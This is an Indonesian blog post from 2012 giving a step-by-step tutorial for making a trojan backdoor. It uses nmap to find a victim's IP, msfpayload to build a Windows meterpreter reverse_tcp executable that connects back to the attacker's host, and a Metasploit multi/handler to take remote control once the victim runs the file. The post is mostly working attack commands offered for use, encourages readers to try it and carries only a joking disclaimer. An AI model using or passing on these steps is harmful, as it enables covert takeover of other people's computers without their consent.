Minggu, 06 Mei 2012

Membuat Trojan Backdoor pada Backtrack

Langkah-langkah :

Lankah-langkah mempersiapkan target :
  1. lakukan scanning untuk mencari IP Address dari korban atau IP yang aktif dalam satu jaringan dengan tool nmap (Zenmap) yang sudah tersedia di bactrack, command line : nmap -vvvv -O atau nmap -A -T4 IP address korban.
  2. setelah mendapatkan IP Address korban, langkah selanjutnya adalah melakukan ping IP korban untuk mengetahui jaringan terkoneksi atau tidak. contoh ping 192.168.10.3 (IP korban).
Langkah-langkah mempersiapkan Trojan backdoor :
  1. langkah selanjutnya membuat Trojan sederhana yang masih bisa dideteksi oleh anti virus (dimisalkan korban menggunakan sistem operasi windows). command line : # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.1 x > /root/Desktop/latihan.exe
  2. LHOST=192.168.10.1 merupakan IP yang digunakan di PC kita. 
  3. /root/Desktop/latihan.exe merupakan tempat menyimpan trojan dan nama dari trojan tersebut, yaitu latihan.exe.
  4. setelah trojan selesai. anggap saja trojan dengan nama latihan.exe yang kita buat tadi sudah ada di PC korban atau target kita.
Langkah-langkah menyerang Target :
  1. setelah itu kita menuju ke metasploit, ketik command line : msfconsole (lalu tekan enter).
  2. maka aplikasi metasploit berbasis command line akan terbuka dan akan muncul tampilan msf >
  3. lalu kita gunakan metasploit untuk melakukan handle, command line : msf > use exploit/multi/handler
  4. setelah itu kita set payload, comman line : set PAYLOAD windows/meterpreter/reverse_tcp (tekan enter).
  5. muncul :  payload => windows/meterpreter/reverse_tcp
  6. dilajutkan dengan set ulang IP LHOST kita, command line : set LHOST 192.168.10.1 (tekan enter).
  7. muncul : lhost => 192.168.10.1
  8. Dan langkah terakhir yang paling ditunggu-tunggu adalah mengaktifkan trojan yang kita buat tadi dengan cara ketik comman line : exploit (tekan enter).
  9. lalu muncul Starting . . . 
  10. dimisalkan korban sudah menggklik trojan yang kita buat, yaitu latihan.exe maka kita dengan leluasa dan sebebas-bebasnya meremote PC korban. thanks. . . . :)
Silahkan dicoba & semoga berhasil..

Tutorial ini hanya untuk pengetahuan saja, segala resiko & akibat ditanggung penumpang hehe....
 

Tidak ada komentar:

Posting Komentar

Pengikut